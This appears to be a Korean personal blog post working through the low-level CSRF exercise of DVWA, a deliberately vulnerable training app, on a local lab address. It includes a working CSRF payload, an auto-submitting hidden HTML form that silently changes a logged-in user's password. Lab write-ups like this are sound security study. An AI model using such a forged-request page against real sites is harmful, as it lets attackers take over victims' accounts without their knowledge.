본문 바로가기
해킹/DVWA

DVWA 실습 3. Cross Site Request Forgery (CSRF) (Low)

by yenua 2022. 5. 19.
반응형

CSRF에서는 비밀번호를 바꾸는 사이트가 나온다.

공백인 상태로 change를 누르면 비밀번호가 공백으로 변하면서 아래 링크로 접속 되는데, 이번에도 get 방식으로 인자들이 전달 된다...

http://192.168.0.101/vulnerabilities/csrf/?password_new=&password_conf=&Change=Change

 

<form name="frm" method="get" action="http://192.168.0.101/vulnerabilities/csrf/">
	<input type="hidden" name="password_new" value="password">
	<input type="hidden" name="password_conf" value="password">
	<input type="hidden" name="Change" filename="Change">
</form>


<script>
document.frm.submit();
</script>

위 코드처럼 작성한 html 파일을 만들고, 접속을 시도해보면, 

비밀번호가 바뀌었다고 뜬다. 실제로 로그인해보면 비밀번호가 공백에서 password로 바뀐 것을 알 수 있다.

반응형

'해킹 > DVWA' 카테고리의 다른 글

DVWA 실습 5. File Upload (Low)  (0) 2022.05.19
DVWA 실습 4. File Inclusion (Low)  (0) 2022.05.19
DVWA 실습 2. Command Injection (Low)  (0) 2022.05.19
DVWA 실습 1. Brute Force (Low)  (0) 2022.05.18
DVWA 환경 구축  (0) 2022.05.18